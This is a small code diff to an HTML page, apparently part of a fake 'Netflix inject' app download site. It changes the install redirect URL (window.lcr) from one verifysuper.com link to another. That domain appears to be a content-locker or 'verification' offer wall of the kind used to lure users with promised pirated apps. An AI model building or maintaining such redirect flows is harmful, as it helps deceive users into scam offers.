--- a/itweakvip/OGInject/netflix.html
+++ b/itweakvip/OGInject/netflix.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=d0b5c58d0c345e83439553a5746f9a0c";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
